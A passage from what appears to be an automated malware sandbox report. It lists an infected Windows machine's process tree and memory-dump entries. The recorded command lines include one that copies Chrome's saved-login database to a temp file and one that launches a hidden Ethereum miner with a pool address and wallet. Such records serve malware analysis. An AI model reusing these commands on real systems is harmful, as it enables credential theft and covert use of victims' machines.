                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      /c del "C:\Users\Admin\Pictures\Adobe Films\tUDPHIDN_1Ea19xs4CbAHd7y.exe"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4964
                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:7056
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4D47.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4D47.exe
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:1288
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:4660
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\13A6.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\13A6.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:7280
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Oxbfp2p-x\obi0fz-zt.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Oxbfp2p-x\obi0fz-zt.exe"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:6840
                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:2580
                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                PID:2380
                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                PID:3308
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:1632
                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:1396
                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:1256
                                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:1092
                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      PID:1028
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\ratiavg
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\ratiavg
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:8000
                                                                                                                                                                                                                                                                                        • \??\c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                                                          c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:976
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\ratiavg
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\ratiavg
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:7380
                                                                                                                                                                                                                                                                                            • C:\ProgramData\DriverXLiveEditor\XLiveDriverApiSound.exe
                                                                                                                                                                                                                                                                                              C:\ProgramData\DriverXLiveEditor\XLiveDriverApiSound.exe
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:4600
                                                                                                                                                                                                                                                                                                • C:\ProgramData\DriverXLiveEditor\60E0E17244B3B5CE8291M01e.exe
                                                                                                                                                                                                                                                                                                  "C:\ProgramData\DriverXLiveEditor\60E0E17244B3B5CE8291M01e.exe" -epool eu1.ethermine.org:4444 -ewal 0x3Ec741B7B93022e5fC3AeBCb0C776eCF6c9DA6E1 -worker Unhittable -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:6992
                                                                                                                                                                                                                                                                                                • \??\c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                                                                  c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:5516
                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:348
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09f69eef9c0d5b.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09f69eef9c0d5b.exe" /SILENT
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:920
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-UP9B9.tmp\Wed09f69eef9c0d5b.tmp
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-UP9B9.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$40158,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09f69eef9c0d5b.exe" /SILENT
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                      PID:1876
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                    PID:4600
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:2888
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:208
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                        PID:6972
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4692
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:5252
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:7844
                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:7468
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:5508
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:224
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:7672
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:3680
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:5384
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:6900
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:7396
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:2260
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:7696

                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                • memory/348-461-0x0000013EA4140000-0x0000013EA41B2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  456KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/820-228-0x0000000001000000-0x0000000001001000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/820-251-0x0000000005020000-0x0000000005021000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/820-202-0x0000000000820000-0x0000000000821000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/900-317-0x00000000054F0000-0x00000000054F1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/900-301-0x0000000005510000-0x0000000005511000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/900-292-0x0000000005430000-0x0000000005474000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  272KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/900-278-0x0000000000C60000-0x0000000000C61000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/900-280-0x0000000002EB0000-0x0000000002EB1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/920-246-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1092-497-0x0000021F92140000-0x0000021F921B2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  456KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1168-285-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1168-328-0x0000000004E50000-0x0000000005456000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-182-0x0000000002F70000-0x0000000002F71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-214-0x00000000073C0000-0x00000000073C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-433-0x000000007F270000-0x000000007F271000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-223-0x0000000006D80000-0x0000000006D81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-230-0x0000000006D82000-0x0000000006D83000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-185-0x0000000002F70000-0x0000000002F71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-207-0x0000000006D40000-0x0000000006D41000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1196-504-0x0000000006D83000-0x0000000006D84000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1352-210-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1632-509-0x0000022EE05E0000-0x0000022EE05FB000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  108KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1632-451-0x0000022EE0840000-0x0000022EE08B2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  456KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1632-512-0x0000022EE3000000-0x0000022EE3105000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1636-213-0x000000001AC90000-0x000000001AC92000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1636-197-0x0000000000090000-0x0000000000091000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-184-0x0000000002F50000-0x0000000002F51000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-408-0x000000007E900000-0x000000007E901000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-227-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-272-0x00000000084B0000-0x00000000084B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-270-0x0000000007C30000-0x0000000007C31000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-190-0x0000000002F50000-0x0000000002F51000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-217-0x0000000004DE2000-0x0000000004DE3000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-260-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-255-0x0000000007D50000-0x0000000007D51000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-253-0x0000000007BA0000-0x0000000007BA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1696-250-0x0000000007390000-0x0000000007391000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1880-531-0x00000188D25B0000-0x00000188D2622000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  456KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1928-219-0x0000000000880000-0x0000000000881000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/1928-249-0x0000000005070000-0x00000000050E6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2056-231-0x0000000000400000-0x0000000002DAA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  41.7MB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2056-229-0x00000000001C0000-0x00000000001C9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-143-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-142-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-135-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  572KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-145-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-147-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  572KB

                                                                                                                                                                                                                                                                                                                                  Download

                                                                                                                                                                                                                                                                                                                                • memory/2240-141-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  152KB

